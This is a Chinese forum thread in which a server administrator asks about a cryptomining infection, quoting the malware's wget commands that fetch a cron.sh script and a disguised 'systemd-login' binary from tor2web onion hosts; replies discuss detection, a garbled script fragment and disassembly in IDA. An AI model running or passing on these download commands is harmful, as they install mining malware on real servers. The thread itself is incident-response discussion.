这是一个创建于 1740 天前的主题,其中的信息可能已经有所发展或是发生改变。
wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh
能看懂中间是 base64 加密,开头和结尾是什么?
第 1 条附言 · 2019-07-15 17:15:54 +08:00
最终找到二进制文件,不会看里面的内容。
wget -t1 -T180 -qU- --no-check-certificate aptgetgxqs3secda.tor2web.io/systemd-login -O test
wget -t1 -T180 -qU- --no-check-certificate aptgetgxqs3secda.tor2web.io/systemd-login -O test
第 2 条附言 · 2019-07-15 17:46:28 +08:00
由于二进制文件不好搞,现在的暂时解决办法是,把域名解析改掉
 |
1
bumz 2019-07-15 15:18:50 +08:00 via iPhone
tor2web
隐藏的还挺好 |
 |
2
AllenBigBear 2019-07-15 15:30:00 +08:00
萌新请教,怎么发现服务器被挖矿的哈?
|
 |
3
15651980765 2019-07-15 15:32:08 +08:00
@AllenBigBear = =服务商会发短信告诉你你的服务器 CPU 运行异常,长时间冲高。
|
 |
4
wangking OP @AllenBigBear 我们是监控报的,上来看,发现有异常进程
|
|
6
AllenBigBear 2019-07-15 15:59:27 +08:00
@15651980765 哦哦,好的,谢谢!
|
 |
7
shinodajmk 2019-07-15 16:01:34 +08:00
服务器挖矿,这收益率是很低的。CPU 扛矿。除非你是 GPU 型机子,很棒帮
|
 |
8
dlsflh 2019-07-15 16:19:46 +08:00 via Android
@shinodajmk 你要不去看一下 XMR ?
|
 |
9
defunct9 2019-07-15 17:24:08 +08:00
s.bsst
6!8- #C@> cp -pf /H tmp/.00 CE /lib/sys!emd ! -log!in6r ; toucpxhd |
|
10
defunct9 2019-07-15 17:24:54 +08:00
这是个前置的,一旦运行估计就开始下东西。安装,运行
|
 |
12
moonfly 2019-07-15 19:47:46 +08:00 via iPhone
二进制程序要反汇编,拖到 IDA 里看看,没加密混淆的话,应该能看出大致的程序运行逻辑,如果确定是挖矿木马,那就没啥分析的价值了!顶多学学它的自启动脚本怎么写的!
话说服务器被挖矿,第一件事情不是应该查是如何被挂的马吗? |
Select Language